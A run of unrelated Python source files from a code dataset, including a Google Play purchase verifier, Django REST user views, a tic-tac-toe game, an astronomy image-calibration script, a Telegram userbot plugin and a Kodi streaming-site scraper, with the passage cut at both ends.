logging.getLogger('ggpay')\n\n\nclass GGPay(object):\n \"\"\"google支付\"\"\"\n\n client_id = None\n client_secret = None\n access_token = None\n\n def __init__(self, client_id, client_secret, access_token):\n self.client_id = client_id\n self.client_secret = client_secret\n self.access_token = access_token\n \n def verify_bill(self, bill_id, package_name, product_id, purchase_token):\n \"\"\"\n 判断订单是否合法\n 需要注意,客户端在调用支付的时候需要把 bill_id 传给 extra 字段\n 文档: https://developers.google.com/android-publisher/api-ref/purchases/products/get?hl=zh\n \"\"\"\n logger.debug('purchase check start.bill_id: %s', bill_id)\n\n # 这是老版\n # url_tpl = 'https://www.googleapis.com/androidpublisher/v1.1/applications/{packageName}/inapp/{productId}/purchases/{token}'\n url_tpl = 'https://www.googleapis.com/androidpublisher/v2/applications/{packageName}/purchases/products/{productId}/tokens/{token}'\n\n url = url_tpl.format(\n packageName=package_name,\n productId=product_id,\n token=purchase_token,\n )\n\n rsp = requests.get(url, params=dict(\n access_token=self.access_token,\n ))\n\n if not rsp.ok:\n logger.error('purchase invalid. status_code: %s, rsp: %s', rsp.status_code, rsp.text)\n return False\n\n jdata = rsp.json()\n\n if 'purchaseState' not in jdata:\n logger.error('purchase invalid.bill_id: %s jdata: %s', bill_id, jdata)\n return False\n\n if jdata['purchaseState'] == 0 and jdata['developerPayload'] == 'DeveloperPayloadITEM%s' % bill_id:\n logger.error('purchase valid.bill_id: %s jdata: %s', bill_id, jdata)\n return True\n else:\n logger.error('purchase invalid.bill_id: %s jdata: %s', bill_id, jdata)\n return False\n","sub_path":"ggpay/ggpay.py","file_name":"ggpay.py","file_ext":"py","file_size_in_byte":2452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"430921668","text":"fraseOriginal = input(\"Digíte uma frase: \")\nfraseOriginal = fraseOriginal.replace(\" \", \"\", -1)\n\nfraseReversa = \"\"\n\nfor i in range(len(fraseOriginal) - 1, -1, -1):\n fraseReversa += fraseOriginal[i]\n\nif fraseOriginal == fraseReversa:\n print(\"Iguais\")\nelse:\n print(\"Não iguais\")","sub_path":"Python/Scripts Python/desafios/mundo02/for/desafio053.py","file_name":"desafio053.py","file_ext":"py","file_size_in_byte":286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"200887308","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n#\n# Copyright 2008 TUBITAK/UEKAE\n# Licensed under the GNU General Public License, version 2.\n# See the file http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt\n\nfrom pisi.actionsapi import pisitools\nfrom pisi.actionsapi import get\n\nWorkDir=\"qmmp_skins-%s\" %get.srcVERSION()\n\ndef install():\n for skin in (\"parskin\", \"parskin_v.2\", \"qmmp_black\", \"qmmp_black_mod1\"):\n pisitools.insinto(\"/usr/share/qmmp/skins/%s\" % skin, \"%s/*\" % skin)\n\n pisitools.dodoc(\"COPYING\")\n","sub_path":"2008/stable/applications/multimedia/qmmp-skins/actions.py","file_name":"actions.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"540714258","text":"from django.contrib.auth import get_user_model, authenticate\nfrom rest_framework.permissions import AllowAny\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\nfrom rest_framework.viewsets import GenericViewSet\n\nfrom quickstart.serializers import LoginSerializer, NewUserSerializer\n\nNewUser = get_user_model() #引用用户模型\n\nclass LoginApiView(APIView):\n # permission_classes = (AllowAny,)\n # authentication_classes = ()\n\n def post(self, request, *args, **kwargs):\n data = request.data\n serializer = LoginSerializer(data=data)\n serializer.is_valid(raise_exception=True)\n validated_data = serializer.validated_data\n user = authenticate(username=validated_data['username'],password=validated_data['password'])\n if user is None:\n return Response({'code':402, 'desc':'用户名或密码错误'})\n else:\n return Response({'code':200, 'desc':'登录成功'})\n\n\nclass NewUserViewSet(GenericViewSet):\n\n # permission_classes = (AllowAny,)\n queryset = NewUser.objects.all()\n serializer_class = NewUserSerializer\n\n def get_queryset(self):\n return NewUser.objects.filter(is_active=True)\n\n def list(self, request, *args, **kwargs):\n objs = self.get_queryset()\n serializer_data = NewUserSerializer(objs,many=True).data\n return Response(serializer_data)\n\n\n def create(self, request, *args, **kwargs):\n data = request.data\n serializer = NewUserSerializer(data=data)\n serializer.is_valid(raise_exception=True)\n serializer.save()\n return Response({'code':200, 'desc':'创建成功'})\n\n def update(self, request, pk, *args, **kwargs):\n obj = self.get_object()\n serializer = NewUserSerializer(obj,data=request.data)\n serializer.is_valid(raise_exception=True)\n serializer.save()\n return Response({'code':200, 'desc':'修改成功'})\n\n def retrieve(self, request, *args, **kwargs):\n obj = self.get_object()\n serializer_student = NewUserSerializer(obj)\n return Response(serializer_student.data)\n\n","sub_path":"quickstart/user_views.py","file_name":"user_views.py","file_ext":"py","file_size_in_byte":2137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"390128570","text":"import numpy as np\nfrom astropy.io import fits\n# import matplotlib.pyplot as plt\nimport os\nimport time\n\ndirectory = \"gaia-606\"\noutput_dir = \"CORRECTED_gaia-606\"\n\nall_images_name_list = os.listdir(directory)\n\noffset_lst_files = [os.path.join(directory, name) for name in all_images_name_list if \"Offset\" in name]\nflat_lst_files = [os.path.join(directory, name) for name in all_images_name_list if \"Flat\" in name]\ngaia_lst_files = [os.path.join(directory, name) for name in all_images_name_list if \"Gaia\" in name]\n\n# offset\nhdu_offset = [fits.open(images) for images in offset_lst_files]\ndata_list_offset = [images[0].data for images in hdu_offset]\nmaster_offset = np.median(data_list_offset, axis=0)\n\n# flat\nhdu_flat = [fits.open(images) for images in flat_lst_files]\ndata_list_flat = [images[0].data for images in hdu_flat]\nmaster_flat = np.median(data_list_flat, axis=0)\n\n\ndef flat_field(images_index):\n global master_flat\n global master_offset\n\n im = fits.open(gaia_lst_files[images_index])\n data_im = im[0].data\n data_im_new = ((data_im - master_offset) * np.mean(master_flat)) / (master_flat - master_offset)\n name = (\"image_corrected_\" + str(images_index+1).zfill(3) + \".fits\")\n fits.writeto(os.path.join(output_dir, name), data_im_new, im[0].header)\n print(\"image_corrected_\" + str(images_index+1).zfill(3) + \".fits\" + \" has been created\")\n return\n\n\nif __name__ == \"__main__\":\n start_time = time.time()\n for i in range(len(gaia_lst_files)):\n flat_field(i)\n end_time = time.time()\n print(\"Completed in: \", (end_time - start_time))\n\n# data_im_new, im = flat_field(0)\n#\n# fits.writeto(\"test.fits\", data_im_new, im[0].header)\n# fits.writeto(\"test_flat.fits\", master_flat, im[0].header)\n","sub_path":"gaia.py","file_name":"gaia.py","file_ext":"py","file_size_in_byte":1734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"199835240","text":"from ..helpers import get_allowed\n\nimport os\nimport web\n\nclass ListProvidersR:\n \"\"\"\n This endpoint lists all of the providers that have been added.\n \"\"\"\n allow_origin, rest_url = get_allowed.get_allowed()\n def GET(self):\n \"\"\" GET HTTP Request \"\"\"\n web.header('Access-Control-Allow-Origin', self.allow_origin)\n try:\n providers = {}\n if os.path.isfile('providers.txt'):\n with open('providers.txt', 'r') as f:\n for line in f:\n providers[line.split(\":\")[0]] = line.split(\":\")[1].strip()\n return providers\n except:\n return \"unable to get providers\"\n","sub_path":"vcontrol/rest/providers/list_all.py","file_name":"list_all.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"574604211","text":"# coding=utf-8\nimport sys, random, time\n\nfrom PySide2 import QtCore, QtGui, QtWidgets\n\nfrom ui_mainwindow import Ui_MainWindow\n\n# Класс основного окна\nclass MainWindow(QtWidgets.QWidget, Ui_MainWindow):\n\n # Инициализация основного окна\n def __init__(self):\n super(MainWindow, self).__init__()\n self.setupUi(self)\n self.assignWidgets()\n self.show()\n\n # Функция устанавливает обработчики нажатия на каждую из кнопок\n def assignWidgets(self):\n for i in range(9):\n temp_button = self.findChild(QtWidgets.QPushButton, str(buttons[i]))\n temp_button.clicked.connect(self.Pushed)\n self.NewGame.clicked.connect(self.NewGamePushed)\n\n # Функция-обработчик нажатия кнопки \"Новая игра\"\n def NewGamePushed(self):\n window.ScoreUser.display(0)\n window.ScoreComp.display(0)\n xoboard.StartNewGame()\n\n # Функция-обработчик нажатия кнопки на поле. Определяет, какая кнопка нажата\n # и пытается поставить туда символ пользователя (Х)\n def Pushed(self):\n sending_button = self.sender()\n sending_button_name = str(sending_button.objectName())\n button_number = buttons.index(sending_button_name)\n if xoboard.TryToMove(button_number, 1) != 0:\n fight = Fight()\n fight.Move()\n\n# Класс для работы с полем\nclass XOBoard:\n\n # Инициализация массива\n def __init__(self):\n self.StartNewGame()\n\n # Функция старта новой игры, очищает массив и поле\n def StartNewGame(self):\n for i in range(9):\n Pole[i] = 0\n self.DrawPole()\n\n # Функция отрисовки содержимого массива позиций на поле\n def DrawPole(self):\n for i in range(9):\n temp_button = window.findChild(QtWidgets.QPushButton, str(buttons[i]))\n if Pole[i] == 0:\n temp_button.setText('')\n if Pole[i] == 1:\n temp_button.setText('X')\n if Pole[i] == 2:\n temp_button.setText('O')\n\n # Функция проверки наличия выигрышной комбинации\n def CheckWin(self):\n win = 0\n showdialog = ShowDialog()\n for i in range(8):\n if Pole[win_comb[i][0]] == Pole[win_comb[i][1]] == Pole[win_comb[i][2]] != 0:\n win = Pole[win_comb[i][0]]\n if win == 1:\n showdialog.Show('You win!')\n score_val = window.ScoreUser.value()\n window.ScoreUser.display(score_val + 1)\n elif win == 2:\n showdialog.Show('You loose!')\n score_val = window.ScoreComp.value()\n window.ScoreComp.display(score_val + 1)\n if win != 0:\n self.StartNewGame()\n else:\n self.CheckFullPole()\n\n # Функция проверки заполненного поля без выигрышных комбинаций\n def CheckFullPole(self):\n isFull = 1\n for i in range(9):\n if Pole[i] == 0:\n isFull = 0\n if isFull == 1:\n SNGThread.start()\n\n # Функция проверки, можно ли установить свой символ в данную клетку\n # button_number - номер кнопки, sign - код символа (Х = 1, О = 2)\n def TryToMove(self, button_number, sign):\n if Pole[button_number] == 0:\n Pole[button_number] = sign\n self.DrawPole()\n self.CheckWin()\n return 1\n else:\n return 0\n\n# Класс выполняющий создание новой игры в отдельном потоке\n# (чтобы пользователь успел увидеть финальное состояние поля при ничьей до его сброса)\nclass StartNewGameThread(QtCore.QThread):\n\n def __init__(self):\n QtCore.QThread.__init__(self)\n\n def run(self):\n # Небольшая задержка отрисовки пустого поля, чтобы успеть увидеть последний ход\n time.sleep(0.4)\n # Очистка массива значений поля и самого поля в интерфейсе\n for i in range(9):\n Pole[i] = 0\n window.findChild(QtWidgets.QPushButton, str(buttons[i])).setText('')\n\n# Класс вычисления следующего хода компьютера\nclass Fight:\n\n # Функция вычисления следующего хода компьютера\n def Move(self):\n if self.PossibleToWin() == 0:\n if self.IsDangerous() == 0:\n self.BestDryMove()\n\n # Функция проверки возможности победы в этом ходу и ее реализации\n def PossibleToWin(self):\n return self.TestWinComb(2)\n\n # Функция проверки наличия угрозы на поле и ее предотвращения\n def IsDangerous(self):\n return self.TestWinComb(1)\n\n # Функция реализации холостого хода, если в этом ходу невозможно выиграть и нет угроз\n def BestDryMove(self):\n # Задаем массивы предпочтительных ходов\n # (центральная и угловые клетки в приоритете перед центрами сторон)\n BestMoves1 = [0, 2, 6, 8, 4]\n BestMoves2 = [1, 3, 5, 7]\n # перемешиваем содержимое массивов для внесения разнообразия\n random.shuffle(BestMoves1)\n random.shuffle(BestMoves2)\n # Флаг \"ход сделан\"\n Moved = 0\n # Склеим все ходы в один массив в порядке предпочтения ходов\n BestMoves = []\n BestMoves.extend(BestMoves1)\n BestMoves.extend(BestMoves2)\n # Ищем первый перспективный ход из приоритетного списка\n for i in range(9):\n if Moved == 0:\n if Pole[BestMoves[i]] == 0:\n for i1 in range(8):\n temp_arr = list(win_comb[i1])\n LineLen = 0\n if BestMoves[i] in temp_arr:\n for i2 in range(3):\n if Pole[temp_arr[i2]] != 1:\n LineLen = LineLen +1\n if LineLen == 3 and Moved == 0:\n Moved = xoboard.TryToMove(BestMoves[i], 2)\n # Если не нашлось ни одного перспективного хода - ходим в первую свободную\n # клетку из приоритетного списка\n if Moved == 0:\n for i in range(9):\n if Moved == 0:\n Moved = xoboard.TryToMove(BestMoves[i], 2)\n\n # Функция проверки комбинаций, близких к победе (sign - код символа: Х=1, О=2)\n def TestWinComb(self, sign):\n # Флаг \"ход сделан\"\n Moved = 0\n # перебираем предвыигрышные комбинации\n for i1 in range(24):\n # есть совпадение и мы еще не ходили\n if Pole[danger_comb[i1][0]] == Pole[danger_comb[i1][1]] == sign and Moved == 0:\n for i2 in range(8):\n # выбираем комбинацию в temp_arr\n temp_arr = list(win_comb[i2])\n # удаляем из temp_arr символы предвыигрышной комбинации\n if danger_comb[i1][0] in temp_arr:\n temp_arr.remove(danger_comb[i1][0])\n if danger_comb[i1][1] in temp_arr:\n temp_arr.remove(danger_comb[i1][1])\n # если остался один элемент в массиве, он пуст и хода еще не было - ходим туда\n if len(temp_arr) == 1 and Moved == 0 and Pole[temp_arr[0]] == 0:\n Moved = xoboard.TryToMove(temp_arr[0], 2)\n return Moved\n\n# Класс для отрисовки диалогового окна\nclass ShowDialog:\n\n # Функция отрисовки диалогового окна (text - строка для вывода)\n def Show(self, text):\n msgBox = QtWidgets.QMessageBox()\n msgBox.setText(text)\n msgBox.exec_()\n\nif __name__ == '__main__':\n\n import sys\n # Список наименований кнопок игрового поля\n buttons = ['Field1', 'Field2', 'Field3', 'Field4', 'Field5', 'Field6', 'Field7', 'Field8', 'Field9']\n # Список выигрышных комбинаций\n win_comb = [[0, 1, 2], [3, 4, 5], [6, 7, 8], [0, 3, 6], [1, 4, 7], [2, 5, 8], [0, 4, 8], [2, 4, 6]]\n # Генерируем массив предвыигрышных комбинаций из массива выигрышных\n danger_comb = []\n for i in range(8):\n for i1 in range(3):\n temp_comb = list(win_comb[i])\n del temp_comb[i1]\n danger_comb.append(temp_comb)\n # Основной массив состояния игрового поля\n Pole = {}\n SNGThread = StartNewGameThread()\n app = QtWidgets.QApplication(sys.argv)\n window = MainWindow()\n window.show()\n xoboard = XOBoard()\n xoboard.__init__()\n sys.exit(app.exec_())\n","sub_path":"xo.py","file_name":"xo.py","file_ext":"py","file_size_in_byte":10058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"265852826","text":"import tensorflow as tf\nfrom memory import Memory\nfrom model import Model\nfrom trainer import Trainer\nimport params\nimport json\n\n\n\nwith tf.Session() as sess:\n\n model = Model(params.BOARD_WIDTH, params.BOARD_HEIGHT)\n\n new_saver = tf.train.import_meta_graph('./models/model.meta')\n new_saver.restore(sess, tf.train.latest_checkpoint('./models/'))\n\n # Create the memory\n memory = Memory(params.MEMORY_SIZE)\n\n # Initialize the model parameters\n sess.run(model.var_init)\n\n # Initialize the trainer\n trainer = Trainer(sess, model, memory)\n\n for episode in range(params.NUM_EPISODES):\n print(\"Episode: {}\".format(episode))\n gm = trainer.gen_game(episode)\n\n gm.play(trainer)\n\n print(\"Number of Turns: {}\".format(gm.turn))\n\n # Save model every 5 episodes\n if episode % 5 == 0:\n save_path = new_saver.save(sess, \"./models/model\")\n print(\"Model Saved\")\n\n # Save game every 50 episodes\n if episode % 100 == 0:\n with open(\"../../resources/replays/{}.txt\".format(episode), \"w\") as f:\n f.write(json.dumps(gm.logger.output()))\n print (\"Saved Replay\")","sub_path":"src/training/play_latest.py","file_name":"play_latest.py","file_ext":"py","file_size_in_byte":1107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"597878710","text":"import RPi.GPIO as GPIO\nimport Keypad #import module Keypad\nROWS = 4 # number of rows of the Keypad\nCOLS = 4 #number of columns of the Keypad\nkeys = [ '1','2','3','A', #key code\n '4','5','6','B',\n '7','8','9','C',\n '*','0','#','D' ]\nrowsPins = [29,31,33,35] #connect to the row pinouts of the keypad\ncolsPins = [40,38,36,32] #connect to the column pinouts of the keypad\n\ndef loop():\n keypad = Keypad.Keypad(keys,rowsPins,colsPins,ROWS,COLS) #create Keypad object\n keypad.setDebounceTime(50) #set the debounce time\n while(True):\n key = keypad.getKey() #obtain the state of keys\n if(key != keypad.NULL): #if there is key pressed, print its key code.\n print (\"You Pressed Key : %c \"%(key))\n \nif __name__ == '__main__': #Program start from here\n print (\"Program is starting ... \")\n try:\n loop()\n except KeyboardInterrupt: #When 'Ctrl+C' is pressed, exit the program. \n GPIO.cleanup()","sub_path":"praktek-3/module_keypad/keypad_board.py","file_name":"keypad_board.py","file_ext":"py","file_size_in_byte":1047,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"101107447","text":"\"\"\"Check if userbot alive or not . \"\"\"\n\nimport time\nfrom userbot import StartTime, pepe, get_readable_time\nfrom uniborg.util import admin_cmd\nfrom telethon import version\nfrom platform import python_version\nfrom uniborg import MODULE\nMODULE.append(\"alive\")\n\n\n@borg.on(admin_cmd(pattern=\"alive\", allow_sudo=True))\nasync def amireallyalive(alive):\n reply_to_id = alive.message\n uptime = await get_readable_time((time.time() - StartTime))\n if alive.reply_to_msg_id:\n reply_to_id = await alive.get_reply_message()\n output = f\"\"\"\n**✮PEPEBOT is Up and Running BSDK✮**\n\n 😴 __Lazy as a Sloth__ 😴\n\n✧ **System** : `Linux`\n✧ **Uptime** : `{uptime}`\n✧ **Telethon version** : `{version.__version__}`\n✧ **Python Version** : `{python_version()}`\n✧ **PepeBot Version** : `{pepe}`\n✧ **Database** : `Functioning Normally`\n✧ **My Master** : [NIKITA](https://t.me/kirito6969)\n\n**Pepe is always with you, my master!**\n\n✧ **Repo** : [PEPEBOT](https://github.com/prono69/PepeBot)\"\"\"\n\n sticker = (await borg.get_messages('LazyAF_Pepe', 25))\n await borg.send_file(alive.chat_id, file=sticker)\n await borg.send_message(alive.chat_id, output, reply_to=reply_to_id, link_preview=False)\n await alive.delete()\n","sub_path":"stdplugins/alive.py","file_name":"alive.py","file_ext":"py","file_size_in_byte":1243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"137717194","text":"#-*- coding: utf-8 -*-\n# https://github.com/Kodi-vStream/venom-xbmc-addons\nfrom resources.lib.gui.hoster import cHosterGui\nfrom resources.lib.gui.gui import cGui\nfrom resources.lib.handler.inputParameterHandler import cInputParameterHandler\nfrom resources.lib.handler.outputParameterHandler import cOutputParameterHandler\nfrom resources.lib.handler.requestHandler import cRequestHandler\nfrom resources.lib.parser import cParser\nfrom resources.lib.util import cUtil\nfrom resources.lib.comaddon import progress\n\nSITE_IDENTIFIER = 'libre_stream_org'\nSITE_NAME = 'Libre-Streaming'\nSITE_DESC = 'Films & Séries en streaming'\n\nURL_MAIN = 'http://ls-streaming.com/'\n\nMOVIE_MOVIE = (URL_MAIN + 'films/', 'showMovies')\nMOVIE_NEWS = (URL_MAIN + 'films/', 'showMovies')\nMOVIE_GENRES = (True, 'showGenres')\nMOVIE_QLT = (True, 'showQlt')\n\nSERIE_SERIES = (URL_MAIN + 'series/', 'showMovies')\nSERIE_NEWS = (URL_MAIN + 'series/', 'showMovies')\n#SERIE_LIST = (URL_MAIN + 'liste-des-series/', 'AlphaSearch')\nSERIE_VFS = (URL_MAIN + 'series/version-francaise/', 'showMovies')\nSERIE_VOSTFRS = (URL_MAIN + 'series/vostfr/', 'showMovies')\n\nURL_SEARCH = (URL_MAIN + '?q=', 'showMovies')\nURL_SEARCH_MOVIES = (URL_MAIN + '?q=', 'showMovies')\nURL_SEARCH_SERIES = (URL_MAIN + '?q=', 'showMovies')\nFUNCTION_SEARCH = 'showMovies'\n\ndef load():\n oGui = cGui()\n\n oOutputParameterHandler = cOutputParameterHandler()\n oOutputParameterHandler.addParameter('siteUrl', 'http://venom/')\n oGui.addDir(SITE_IDENTIFIER, 'showSearch', 'Recherche', 'search.png', oOutputParameterHandler)\n\n oOutputParameterHandler = cOutputParameterHandler()\n oOutputParameterHandler.addParameter('siteUrl', MOVIE_NEWS[0])\n oGui.addDir(SITE_IDENTIFIER, 'showMovies', 'Films (Derniers ajouts)', 'news.png', oOutputParameterHandler)\n\n oOutputParameterHandler = cOutputParameterHandler()\n oOutputParameterHandler.addParameter('siteUrl', MOVIE_GENRES[0])\n oGui.addDir(SITE_IDENTIFIER, MOVIE_GENRES[1], 'Films (Genres)', 'genres.png', oOutputParameterHandler)\n\n oOutputParameterHandler = cOutputParameterHandler()\n oOutputParameterHandler.addParameter('siteUrl', MOVIE_QLT[0])\n oGui.addDir(SITE_IDENTIFIER, MOVIE_QLT[1], 'Films (Qualités)', 'films.png', oOutputParameterHandler)\n\n oOutputParameterHandler = cOutputParameterHandler()\n oOutputParameterHandler.addParameter('siteUrl', SERIE_NEWS[0])\n oGui.addDir(SITE_IDENTIFIER, 'showMovies', 'Séries (Derniers ajouts)', 'news.png', oOutputParameterHandler)\n\n #En panne au 14/06\n #oOutputParameterHandler = cOutputParameterHandler()\n #oOutputParameterHandler.addParameter('siteUrl', SERIE_LIST[0])\n #oGui.addDir(SITE_IDENTIFIER, SERIE_LIST[1], 'Séries (Liste)', 'az.png', oOutputParameterHandler)\n\n oOutputParameterHandler = cOutputParameterHandler()\n oOutputParameterHandler.addParameter('siteUrl', SERIE_VFS[0])\n oGui.addDir(SITE_IDENTIFIER, 'showMovies', 'Séries (VF)', 'vf.png', oOutputParameterHandler)\n\n oOutputParameterHandler = cOutputParameterHandler()\n oOutputParameterHandler.addParameter('siteUrl', SERIE_VOSTFRS[0])\n oGui.addDir(SITE_IDENTIFIER, 'showMovies', 'Séries (VOSTFR)', 'vostfr.png', oOutputParameterHandler)\n\n oGui.setEndOfDirectory()\n\ndef showSearch():\n oGui = cGui()\n\n sSearchText = oGui.showKeyBoard()\n if (sSearchText != False):\n sUrl = URL_SEARCH[0] + sSearchText\n showMovies(sUrl)\n oGui.setEndOfDirectory()\n return\n\ndef showGenres():\n oGui = cGui()\n\n liste = []\n liste.append( ['Action', URL_MAIN + 'films/action/'] )\n liste.append( ['Animation', URL_MAIN + 'films/animation/'] )\n liste.append( ['Arts Martiaux', URL_MAIN + 'films/arts-martiaux/'] )\n liste.append( ['Aventure', URL_MAIN + 'films/aventure/'] )\n liste.append( ['Biopic', URL_MAIN + 'films/biopic/'] )\n liste.append( ['Comédie', URL_MAIN + 'films/comedie/'] )\n liste.append( ['Comédie Dramatique', URL_MAIN + 'films/comedie-dramatique/'] )\n liste.append( ['Comédie Musicale', URL_MAIN + 'films/comedie-musicale/'] )\n liste.append( ['Disney', URL_MAIN + 'films/disney/'] )\n liste.append( ['Divers', URL_MAIN + 'films/divers/'] )\n liste.append( ['Documentaire', URL_MAIN + 'films/documentaire/'] )\n liste.append( ['Drame', URL_MAIN + 'films/drame/'] )\n liste.append( ['Epouvante Horreur', URL_MAIN + 'films/horreur/'] )\n liste.append( ['Espionnage', URL_MAIN + 'films/espionnage/'] )\n liste.append( ['Famille', URL_MAIN + 'films/famille/'] )\n liste.append( ['Fantastique', URL_MAIN + 'films/fantastique/'] )\n liste.append( ['Guerre', URL_MAIN + 'films/guerre/'] )\n liste.append( ['Historiques', URL_MAIN + 'films/historique/'] )\n liste.append( ['Horreur', URL_MAIN + 'films/horreur/'] )\n liste.append( ['Musicale', URL_MAIN + 'films/musical/'] )\n liste.append( ['Policier', URL_MAIN + 'films/policier/'] )\n liste.append( ['Romance', URL_MAIN + 'films/romance/'] )\n liste.append( ['Science Fiction', URL_MAIN + 'films/science-fiction/'] )\n liste.append( ['Spectacles', URL_MAIN + 'films/spectacles/'] )\n liste.append( ['Thriller', URL_MAIN + 'films/triller/'] )\n liste.append( ['Western', URL_MAIN + 'films/western/'] )\n\n for sTitle, sUrl in liste:\n\n oOutputParameterHandler = cOutputParameterHandler()\n oOutputParameterHandler.addParameter('siteUrl', sUrl)\n oGui.addDir(SITE_IDENTIFIER, 'showMovies', sTitle, 'genres.png', oOutputParameterHandler)\n\n oGui.setEndOfDirectory()\n\ndef showQlt():\n oGui = cGui()\n\n liste = []\n liste.append( ['HD', URL_MAIN + 'films-hd/'] )\n liste.append( ['DvdRip', URL_MAIN + 'quality/dvdrip/'] )\n liste.append( ['BdRip', URL_MAIN + 'quality/bdrip/'] )\n liste.append( ['R5', URL_MAIN + 'quality/R5/'] )\n liste.append( ['Cam Rip', URL_MAIN + 'quality/camrip/'] )\n liste.append( ['TS', URL_MAIN + 'quality/ts/'] )\n\n for sTitle, sUrl in liste:\n\n oOutputParameterHandler = cOutputParameterHandler()\n oOutputParameterHandler.addParameter('siteUrl', sUrl)\n oGui.addDir(SITE_IDENTIFIER, 'showMovies', sTitle, 'films.png', oOutputParameterHandler)\n\n oGui.setEndOfDirectory()\n\ndef AlphaSearch():\n oGui = cGui()\n oInputParameterHandler = cInputParameterHandler()\n sUrl = oInputParameterHandler.getValue('siteUrl')\n\n progress_ = progress().VScreate(SITE_NAME)\n\n for i in range(0, 36) :\n progress_.VSupdate(progress_, 36)\n if progress_.iscanceled():\n break\n\n if (i < 10):\n sTitle = chr(48 + i)\n else:\n sTitle = chr(65 + i -10)\n\n oOutputParameterHandler = cOutputParameterHandler()\n oOutputParameterHandler.addParameter('siteUrl', sUrl + sTitle.lower() + '.html')\n oOutputParameterHandler.addParameter('sMovieTitle', sTitle)\n oGui.addDir(SITE_IDENTIFIER, 'AlphaDisplay', '[COLOR teal] Lettre [COLOR red]' + sTitle + '[/COLOR][/COLOR]', 'listes.png', oOutputParameterHandler)\n\n progress_.VSclose(progress_)\n\n oGui.setEndOfDirectory()\n\ndef AlphaDisplay():\n oGui = cGui()\n oInputParameterHandler = cInputParameterHandler()\n sUrl = oInputParameterHandler.getValue('siteUrl')\n\n oRequestHandler = cRequestHandler(sUrl)\n sHtmlContent = oRequestHandler.request()\n\n oParser = cParser()\n sPattern = '\"]+?)\">([^<>\"]+?)<\\/a>
    '\n aResult = oParser.parse(sHtmlContent, sPattern)\n\n if (aResult[0] == True):\n total = len(aResult[1])\n progress_ = progress().VScreate(SITE_NAME)\n for aEntry in aResult[1]:\n progress_.VSupdate(progress_, total)\n if progress_.iscanceled():\n break\n\n sUrl = aEntry[0]\n sTitle = aEntry[1]\n\n oOutputParameterHandler = cOutputParameterHandler()\n oOutputParameterHandler.addParameter('siteUrl', sUrl)\n oOutputParameterHandler.addParameter('sMovieTitle', sTitle)\n oGui.addDir(SITE_IDENTIFIER, 'seriesHosters', sTitle, 'az.png', oOutputParameterHandler)\n\n progress_.VSclose(progress_)\n\n oGui.setEndOfDirectory()\n\ndef showMovies(sSearch = ''):\n oGui = cGui()\n oParser = cParser()\n if sSearch:\n sUrl = sSearch.replace(' ', '+')\n else:\n oInputParameterHandler = cInputParameterHandler()\n sUrl = oInputParameterHandler.getValue('siteUrl')\n\n oRequestHandler = cRequestHandler(sUrl)\n sHtmlContent = oRequestHandler.request()\n\n sPattern = '
    .+?class=\"maskhr\">Synopsis.+?(.+?)
    '\n if '/films' in sUrl:\n sPattern = sPattern + '.+?
    '\n if '/series' in sUrl:\n sPattern = sPattern + '.+?>Séries.+?(.+?)'\n\n aResult = oParser.parse(sHtmlContent, sPattern)\n\n if (aResult[0] == False):\n oGui.addText(SITE_IDENTIFIER)\n\n if (aResult[0] == True):\n total = len(aResult[1])\n progress_ = progress().VScreate(SITE_NAME)\n for aEntry in aResult[1]:\n progress_.VSupdate(progress_, total)\n if progress_.iscanceled():\n break\n\n #Si recherche et trop de resultat, on nettoye\n if sSearch and total > 2:\n if cUtil().CheckOccurence(sSearch.replace(URL_SEARCH[0], ''), aEntry[1]) == 0:\n continue\n\n sTitle = aEntry[1].replace(' - Saison', ' Saison')\n sUrl2 = aEntry[2]\n sDesc = aEntry[3]\n sThumb = aEntry[0]\n if sThumb.startswith('/'):\n sThumb = URL_MAIN[:-1] + sThumb\n\n if not '/series/' in sUrl and not '/films/' in sUrl:\n sDisplayTitle = sTitle\n\n if '/films/' in sUrl:\n sQual = aEntry[4]\n #on supprime [VOSTFR], [HD 720p] et DVDRIP du titre car affiche en tant que qualite sinon doublons\n sMovieTitle = sTitle.replace('[VOSTFR]', '').replace('[HD 720p]', '').replace('DVDRIP ', '')\n sDisplayTitle = sMovieTitle + ' [' + sQual + ']'\n\n if '/series/' in sUrl:\n if not '/vostfr/' in sUrl and not '/version-francaise/' in sUrl:\n sLang = aEntry[4]\n sLang = sLang.replace('Version Française', 'VF')\n sDisplayTitle = sTitle + ' (' + sLang + ')'\n else:\n sDisplayTitle = sTitle\n\n oOutputParameterHandler = cOutputParameterHandler()\n oOutputParameterHandler.addParameter('siteUrl', sUrl2)\n oOutputParameterHandler.addParameter('sMovieTitle', sTitle)\n oOutputParameterHandler.addParameter('sThumb', sThumb)\n\n if '/series/' in sUrl or '-saison-' in sUrl2:\n oGui.addTV(SITE_IDENTIFIER, 'seriesHosters', sDisplayTitle, '', sThumb, sDesc, oOutputParameterHandler)\n else:\n oGui.addMovie(SITE_IDENTIFIER, 'showHosters', sDisplayTitle, '', sThumb, sDesc, oOutputParameterHandler)\n\n progress_.VSclose(progress_)\n\n sNextPage = __checkForNextPage(sHtmlContent)\n if (sNextPage != False):\n oOutputParameterHandler = cOutputParameterHandler()\n oOutputParameterHandler.addParameter('siteUrl', sNextPage)\n oGui.addNext(SITE_IDENTIFIER, 'showMovies', '[COLOR teal]Next >>>[/COLOR]', oOutputParameterHandler)\n\n if not sSearch:\n oGui.setEndOfDirectory()\n\ndef 